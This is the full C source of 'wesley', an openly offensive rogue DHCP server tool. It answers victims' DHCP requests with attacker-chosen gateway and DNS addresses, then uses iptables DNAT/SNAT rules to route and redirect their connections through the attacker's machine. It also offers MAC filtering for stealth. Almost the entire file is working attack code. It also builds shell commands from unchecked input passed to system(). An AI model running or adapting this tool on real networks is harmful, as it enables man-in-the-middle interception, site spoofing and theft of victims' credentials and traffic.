/**********************************************************************************
 * Description:
 * Rogue DHCP spoofer. Allows seamless forwarding of traffic via an attacker's
 * computer, invisible redirection of a victim's connections, and MAC filtering
 * for increased stealth.
 *
 * Dependancies:
 * Requires iptables to be installed, as well as named if you choose to use the -D
 * option. Note that basic forwarding features will work without iptables, but
 * connection redirection and MAC filtering will not.
 *
 * Compilation:
 * Compile with: #gcc wesley.c -o wesley
 *
 * Supported platforms:
 * Tested on Linux 2.6.11, should compile on other *nix systems. BSD users may need
 * to replace the code which enables IP forwarding and iptables with the proper sysctl 
 * and pf commands, or just set them manually.
 *
 * Bugs:
 * Fixed a segmentation fault when specifying a domain name. No other *known* bugs...   
 *
 * Author:
 * Craig Heffner
 * Report any bugs/questions/comments to heffnercj@gmail.com
 * (08/17/06)
 **********************************************************************************
*/

#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define IP "255.255.255.255" //broadcast address
typedef short int U_8;
typedef long int U_32;
void usage();
void iptables();

//global variables...
char *yourip; //holds client ip
char *tdnsip; //holds real dns ip
char *gateip; //holds gateway ip
char *rdnsip; //holds reported dns ip
char *netmask; //holds netmask
char *tempip; //for temporarily holding the network byte order versions of the IP addresses
char *spoof_ip; //holds the ip address to redirect spoofed connections to
char *filename; //name of file that holds list of ip addresses to spoof
char dnat[512]; //holds dnat rule
char snat[512]; //holds snat rule
char spoof_dnat[512];
char spoof_snat[512];
char string[512];
char c,d;
int spoof=0; //used to indicate if we need to spoof any IP addresses
int domain_spec = 0;

int main(int argc, char *argv[])
{	
	int cfd;//socket decriptor
	int port=67,cport=68;//port to listen on, port to send to
	int a=0,b=0; //for various loops
	int master=0; //indicates if a master domain has been specified
	struct sockaddr_in client; //client structure
	struct sockaddr_in server; //server structure
	int optval=1; //option value for SO_BROADCAST
	int addr_len=sizeof(server),addr_len2=sizeof(client); //size of the above structs
	int named=0; //used to indicate if named is to be started
	int dnstrue=0; //used to indicate if real DNS server has been specified
	int usage_good=0; //used to indicate if usage is good
	int netmask_good=0; //used to indicate if netmask has been specified
	char temp[512];//temporarily holds lines read by fscanf
	char domain_name[512]; //stores the domain named
	char *p; //for copying domain name from file
	int domain_size,master_size; //set to the size of the domain name
	char requested_ip[4],required_ip[4]; //used to see if we have successfully spoofed the transaction
	int mac=0;
	char *macfile;
	char macfilter[512];
	
	//check usage
	if(argc==1){
		usage();
		return(0);
	}
	
	while(a<argc){
		if(strcmp(argv[1],"-h")==0){
			printf("\n");
			system("cat ./wesley.README | less");
			return(0);
		} else if(strcmp(argv[a],"-c")==0){
			yourip=argv[a+1];
			usage_good++;
		} else if(strcmp(argv[a],"-t")==0){
			tdnsip=argv[a+1];
			dnstrue=1;
		} else if(strcmp(argv[a],"-g")==0){
			gateip=argv[a+1];
			usage_good++;
		} else if(strcmp(argv[a],"-r")==0){
			rdnsip=argv[a+1];
			usage_good++;
		} else if(strcmp(argv[a],"-n")==0){
			netmask=argv[a+1];
			netmask_good++;
		} else if(strcmp(argv[a],"-d")==0){
			p=argv[a+1];
			memcpy(domain_name,p,512);
			//loop to get the length of the domain name
			while(b<512){
				if(*p=='\0'){
					domain_size=b-1;
					break;
				}
				++p;
				b++;
			}
			domain_spec = 1;

		} else if(strcmp(argv[a],"-D")==0){
			named=1;
		} else if(strcmp(argv[a],"-s")==0){
			spoof_ip=argv[a+1];
			filename=argv[a+2];
			spoof=1;
		} else if(strcmp(argv[a],"-m")==0){
			mac=1;
			macfile=argv[a+1];
		}
		a++;
	}
	a=0; //zero out a

	//double check usage
	if(usage_good != 3){
		usage();
		return(0);
	} else if(dnstrue==0 && named==1){
		usage();
		return(0);
	}
	
	if(domain_spec==0){ //if no domain name was specified, default to wesley.net
		memcpy(domain_name,"wesley.net",10);
		domain_size=10;
	}

	if(!netmask_good){ //if no netmask specified, default to 255.255.255.0
		netmask="255.255.255.0";
	}
	
	if(tdnsip){ //if a forwarding DNS address was specified, write it into named.conf.options
		FILE *options;
		options=fopen("./named.conf.options","w");
		fprintf(options,"options {\n\tdirectory \"/var/cache/bind\";\n\n\tquery-source address * port 53;\n\n\tforwarders {\n\t\t%s;\n\t};\n\n\tauth-nxdomain no;\n\n};",tdnsip);
		fclose(options);
	}
		printf("\n***************************\n*Wesley rogue DHCP server\n*Craig Heffner\n*(11/05/05)\n***************************\n");
	
	
	if(domain_size>20){
		printf("\nDomain name can be no greater than 20 characters in length.\n\n");
		return(0);
	}
	
		printf("\nInitializing wesley with the following parameters:\n");
		printf("\nClient IP:%s\n",yourip);
		printf("DNS IP:%s\n",rdnsip);
		printf("Gateway IP:%s\n",gateip);
		printf("Netmask:%s\n",netmask);
		printf("Domain Name:%s\n",domain_name);
	
	printf("\nClearing previous iptables rules...\n");
	system("iptables -F");
	printf("Clearing previous iptables nat table...\n");
	system("iptables -t nat -F");
	
	if(mac==1){ //if mac filtering has been enabled
		printf("Enabling MAC filtering...\n");
		FILE *mac;
		mac=fopen(macfile,"r");
		if(!mac){
			printf("Unable to open %s. Aborting MAC filtering.\n",macfile);
		} else {
		while(1){
			d=fscanf(mac,"%s",temp);
			if(d==EOF){
				break;
			}
			strcpy(macfilter,"iptables -t nat -A PREROUTING -m mac --mac-source ");
			strcat(macfilter,temp);
			if(strcmp(temp,"!")==0){
				fscanf(mac,"%s",temp);
				strcat(macfilter," ");
				strcat(macfilter,temp);
			}
			strcat(macfilter," -j DROP");
			system(macfilter);
		}
		fclose(mac);
		}
	}
	if(named==1){ //should named be started?
		printf("\nStarting named. If more than one session is shown below,\nplease stop all previous instances of named:\n");
		system("named -c ./named.conf");
		system("ps -U $USER | grep named");
	} else {
		printf("Not starting named; -D flag not found.\n\n");
	}

	
	//declare and define payload structures for sending and recieving DHCP packets
	struct packet{
		char type; //DHCP type (reply/request)
		char hwtype[3]; //hardware address type, length, and number of hops
		char ID[4]; //DHCP transaction ID
		char flags[8]; //all zeros
		long int client_ip; //IP address being offered to client
		char other_ip[8]; //all zeros
		char client_mac[6]; //client machine hardware address
		char cookie[206]; //all zeros except for last 4 bytes which contain the 'magic cookie'
		char msg_type[3]; //message type: discover/request/reply/ACK
		char subnet_def[2]; //define subnet
		char subnet[4]; //subnet mask to be assigned to the client
		char lease_time[6]; //DHCP lease time
		char define_domain; //define the domain
		short int define_domain_size; //size of the domain name
		char domain[domain_size]; //domain name contained in the DHCP packet
		char router_def[2]; //define gateway address
		char router[4]; //gateway IP address
		char dns_def[2]; //define DNS address
		char dns[4]; //DNS server IP address
		char dhcp_def[2]; //define DHCP server address
		char dhcp_server_ip[4]; //DHCP server IP address
		char end_option; //end option (0xff) 
		char padding; //end padding
	} payload,recieve; //create structure for holding spoofed DHCP payloads

	//zero out the structures
	bzero(&payload,sizeof(payload));
	bzero(&recieve,sizeof(recieve));
	
	payload.type=0x02; //set DHCP type to reply
	payload.hwtype[0]=0x01;//set hardware type (Ethernet)
	payload.hwtype[1]=0x06;//set hardware address length
	payload.hwtype[2]=0x00;//set number of hops
	payload.msg_type[0]=0x35;//set first two bytes of message type 
	payload.msg_type[1]=0x01;
	payload.client_ip=inet_addr(yourip);
	payload.cookie[202]=0x63;//set the magic cookie
	payload.cookie[203]=0x82;
	payload.cookie[204]=0x53;
	payload.cookie[205]=0x63;
	payload.subnet_def[0]=0x01;//set the subnet mask
	payload.subnet_def[1]=0x04;
	tempip=inet_addr(netmask);
	memcpy(payload.subnet,&tempip,4);
	payload.lease_time[0]=0x33;//set lease time to 1 day
	payload.lease_time[1]=0x04;
	payload.lease_time[2]=0x00;
	payload.lease_time[3]=0x01;
	payload.lease_time[4]=0x51;
	payload.lease_time[5]=0x80;
	payload.define_domain=0x0f;//define a domain name
	payload.define_domain_size=domain_size;
	memcpy(payload.domain-1,domain_name,domain_size);
	payload.router_def[0]=0x03;//set the default gateway address
	payload.router_def[1]=0x04;
	tempip=inet_addr(gateip);
	memcpy(payload.router,&tempip,4);
	payload.dns_def[0]=0x06;//set the dns server address
	payload.dns_def[1]=0x04;
	tempip=inet_addr(rdnsip);
	memcpy(payload.dns,&tempip,4);
	payload.dhcp_def[0]=0x36;//set the dhcp server address (same as the gateip address)
	payload.dhcp_def[1]=0x04;
	tempip=inet_addr(gateip);
	memcpy(payload.dhcp_server_ip,&tempip,4);
	payload.end_option=0xff;//set end option and padding
	payload.padding=0x00;

	//sockets API stuff starts here...
	cfd=socket(PF_INET,SOCK_DGRAM,0);//create client socket
	if(cfd==-1){printf("Failed to create socket.\n");return(2);}
	bzero(&client,addr_len2);//zero out sockaddr_in structure
	if(setsockopt(cfd,SOL_SOCKET,SO_BROADCAST,&optval,sizeof(optval))==-1){ //set socket to support broadcast address
		printf("Failed to set SO_BROADCAST.\n");
		return(2);
	}
	client.sin_family=AF_INET; 
	client.sin_port=htons(port);//set the port to listen on
	inet_aton(IP,&client.sin_addr);//set address to the broadcast address
	if(bind(cfd,(struct socketaddr*)&client,addr_len2)!=0){ //bind socket to port 67 (source port)
		printf("Error binding client socket.\n");
		return(2);
	}
	client.sin_port=htons(cport); //set structure to specify port 68 as the destination address
	
	//we have to listen for requests using our IP address (not the broadcast address), so create a second sockaddr_in 
	//structure; this structure will be used when calling recvfrom()
	bzero(&server,addr_len);
	server.sin_family=AF_INET;
	server.sin_port=htons(port); //set to listen on port 67
	server.sin_addr.s_addr=INADDR_ANY; //set to our current IP address
	printf("\nListening for DHCP transactions...\n\n");

	for( ; ; ){ //loop to recieve DHCP requests and send back replies
		
		//listen on the socket bound to port 67, but use the server structure spcifying our address
		if(recvfrom(cfd,&recieve,sizeof(recieve),0,(struct sockaddr*)&server,&addr_len)==0){
			printf("Failed to recieve DHCP data.");
		}
		
		if(recieve.msg_type[2]==0x01){ //is this a DHCP discover packet?
			payload.msg_type[2]=0x02;//set message type to DHCP offer	
			//copy transaction ID and client mac address into payload structure
			while(a<4){
				payload.ID[a]=recieve.ID[a];
				a++;
			}
			a=0;
			while(a<6){
				payload.client_mac[a]=recieve.client_mac[a];
				a++;
			}
		} else if(recieve.msg_type[2]==0x03){ //or is it a request packet?
			payload.msg_type[2]=0x05;//set message type to DHCP ACK
			a=0;
		}
			
		//send data to broadcast address, source port=67 destination port=68
		if(sendto(cfd,&payload,300,0,(struct sockaddr*)&client,addr_len2)==-1){
			printf("Failed to send packet.\n");
		}
		//if we just sent a DHCP ACK packet, let's check to see if our spoof was successful
		if(payload.msg_type[2]==0x05){
			//copy the requested IP address into requested_ip
			requested_ip[0]=recieve.lease_time[5];
			requested_ip[1]=recieve.define_domain;
			memcpy(&requested_ip[2],&recieve.define_domain_size,2);
			//copy the IP address offered into required_ip
			memcpy(&required_ip,&payload.client_ip,4);
			//compare the requested ip to the offered ip
			if(memcmp(&requested_ip,&required_ip,4)==0){
				printf("Client successfully spoofed!\n");
				close(cfd);
				iptables();
				printf("If you are spoofing certian web sites, please ensure your web\nserver is enabled. When finished, remove the iptables settings with:\niptables -F -t nat\nand disable ip forwarding with:\necho 0 > /proc/sys/net/ipv4/ip_forward\n\nHave fun!\n\n");
				return(0);
			} else {
				printf("Spoof unsuccessful, waiting for next DHCP request...\n");
			}
		}
	}
	
	return(0);
}

void usage()
{
	printf("\nUsage:\n\n#./wesley -c <client ip> -g <gateway ip> -r <dns ip> [-n <netmask>] [-d <domain name>]\n\t  [-D] [-t <named forwarding ip>] [-s <redirect IP address> <IP file name>]\n\t  [-m <mac address file>]\n\n-h\tDisplay README file\n-c\tIP address to be assigned to victim\n-g\tGateway IP address to be assigned to victim\n-r\tDNS IP address to be assigned to victim\n-n\tNetmask to be assigned to victim\n-d\tDomain name reported to victim\n-D\tStart named\n-t\tForwarding IP address for named\n-s\tUsed to spoof connections to legitimate servers\n-m\tSpecifies a file containing a list of MAC addresses to filter\n\nSee the README file for more.\n\n");
}

void iptables()
{
	//iptables rules defined and set here
	printf("\nEnabling IP forwarding...");
	system("echo 1 > /proc/sys/net/ipv4/ip_forward");
	printf("\nConfiguring iptables for redirection...\n");
	system("iptables -F");
	system("iptables -F -t nat");
	
	//create dnat rule
	strcpy(dnat,"iptables -t nat -A PREROUTING -s ! ");
	strcat(dnat,yourip);
	strcat(dnat," -j DNAT --to-destination ");
	strcat(dnat,yourip);
	
	//create snat rule
	strcpy(snat,"iptables -t nat -A POSTROUTING -s ");
	strcat(snat,yourip);
	strcat(snat," -j SNAT --to-source ");
	strcat(snat,gateip);

	//set iptables rules
	system(dnat);
	system(snat);

	if(spoof==1){ //if spoofing has been enabled...
	FILE *spoof;
	spoof=fopen(filename,"r");
	if(!spoof){
		printf("Failed to open %s! Connection spoofing will not be enabled.\n\n",filename);
	} else {	
		printf("Creating spoofing rules...");
		while(1){
		c=fscanf(spoof,"%s",string);
		if(c==EOF){break;}
		strcpy(spoof_dnat,"iptables -t nat -A PREROUTING -s ");
		strcat(spoof_dnat,yourip);
		strcat(spoof_dnat," -d ");
		strcat(spoof_dnat,string);
		strcat(spoof_dnat," -j DNAT --to-destination ");
		strcat(spoof_dnat,spoof_ip);
		system(spoof_dnat);
		strcpy(spoof_snat,"iptables -t nat -A POSTROUTING -p tcp -s ");
		strcat(spoof_snat,spoof_ip);
		strcat(spoof_snat," -j SNAT --to-source ");
		strcat(spoof_snat,string);
		system(spoof_snat);
		}
		fclose(spoof);
		printf("done.\n\n");
	}

	} else {
		printf("done.\n\n");
	}
}
